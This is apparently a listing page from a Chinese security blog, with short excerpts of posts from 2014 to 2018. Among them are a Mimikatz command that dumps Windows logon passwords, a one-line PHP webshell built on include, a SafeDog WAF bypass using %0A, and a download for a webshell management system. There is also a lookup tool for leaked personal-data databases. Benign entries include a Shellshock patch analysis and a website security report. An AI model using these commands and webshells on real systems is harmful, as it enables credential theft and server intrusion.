Mimikatz 使用小技巧

admin 发布于 2018-04-29 01:56
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimika...

骑士人才系统越权修改简历(demo演示)

admin 发布于 2015-01-24 15:30
wap/pwersonal/wap_user.php中 判断是否登录的代码如下 code 区域 if (intval($_SESSION['uid'])=='' || $_SESSION['username']==''||intval($_SESSION['utype'])==1) { header("Location: ....

2014年中国网站安全报告

admin 发布于 2015-01-13 04:56
下载地址:http://yunpan.cn/cy5kJC3GqLbwQ (提取码:5fdb) 摘要 网站漏洞: 2014年全年,360网站安全检测平台共扫描各类网站164.2万个;其中,存在安全漏洞的网站为61.7万个,占扫描网站总数的37.6%;存在高危安全漏洞的网站共有27.9万个...
标签: 安全报告

google hosts 2014-12

admin 发布于 2014-12-04 05:31
#google hosts 2014 by 360kb.com #base services 64.233.166.116    www.google.com.hk 64.233.166.116    www.google.com 203.208.46.132    accounts.google....
标签: google hosts

窃听风云——关机窃听原理与实现

admin 发布于 2014-11-27 06:55
博文作者:monster 发布日期:2014-11-26 原文地址:http://security.tencent.com/index.php/blog/msg/73 前言 斯诺登此前在接受采访时曾指出美国国家安全局(NSA)可以对手机进行窃听,即使是在关机的情况下也不能幸免...
标签: 窃听 安卓

另类PHP一句话小马

admin 发布于 2014-11-08 10:25
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。 <?php @include($_FILES['u']['tmp_name']); <?php @include($_FILES['u...

安全狗最新版绕过测试 2014-10-22

admin 发布于 2014-10-22 08:30
安全狗最新版绕过测试 2014-10-22 原文链接:http://phpsec.sinaapp.com/?p=270 测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。 用于绕过的核心字符:%0A,某些特殊场合需要...

WebShell箱子管理系统

admin 发布于 2014-10-13 04:17
WEBSHELL箱子系统.zip 解压密码 lanxiang

bash破壳漏洞(ShellShock)补丁绕过分析

admin 发布于 2014-09-28 13:24
官方提供的第一个补丁主要修改了: 1、参数类型和个数的限制,从注释中即可看出: #define SEVAL_FUNCDEF 0x080       / only allow function definitions / define SEVAL_ONECMD  0x100...
标签: ShellShock

本地社工库查询软件 急速版本 2版本

admin 发布于 2014-09-28 13:19
查询的关键词出现次数少的话速度是很快的 我本地3G数据查找只用了30s 9.18 [++] 1.支持拖放         [++] 2.修正文件选择重复问题 http://yunpan.cn/cgyKbMYTMkQAD  提取码 1b3a ...